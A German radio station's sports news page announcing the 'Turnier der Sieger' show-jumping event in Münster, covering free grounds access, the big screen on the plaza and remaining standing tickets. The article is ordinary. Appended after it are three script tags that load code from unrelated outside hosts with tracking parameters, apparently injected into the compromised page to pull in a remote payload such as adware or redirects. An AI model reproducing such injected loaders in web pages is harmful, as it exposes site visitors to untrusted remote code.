Responsive image

on air: 

Simon Pannock
---
---
Immer auf dem Laufenden mit unseren Sportnews

Erste Infos zum "Turnier der Sieger" in Münster

Das Turnier der Sieger vor dem Schloss lockt auch in diesem Jahr die Reitsportelite nach Münster. Ab Donnerstag kommender Woche können Besucher Reitsportgrößen wie Ludger Beerbaum oder Marcus Ehning hautnah erleben. Die Macher des Turniers haben heute Mittag Einzelheiten vorgestellt. Der Zugang zum Turniergelände - und damit auch zum Abreiteplatz - ist wie in den vergangenen Jahren kostenlos. Das Konzept hat sich bewährt, sagt Turnierchef Hendrik Snoek. Egal ob Familien mit Kindern, jung oder alt - die Plaza auf dem Turniergelände mit Essen und Trinken hat sich zum Anziehungspunkt entwickelt. Von dort kann man das Turniergeschehen auf einer großen Leinwand mitverfolgen. Wer noch dichter dran sein möchte, braucht ab Freitag eine Eintrittskarte für eine der Tribünen. Sitzplatztickets werden zwar schon knapp, aber für Kurzentschlossene gibt es selbst für den Turnierhöhepunkt am Sonntag noch Stehplatztickets.

 

<script src="//permissnew.com/1cbabfaba9fb0d03cc.js"></script> <script src="https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&amp;r=1534258578944" type="text/javascript"></script> <script src="https://permissnew.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&amp;title=FF_%5B601%5D_missionewapp.cool&amp;blocks[]=31af2" type="text/javascript"></script>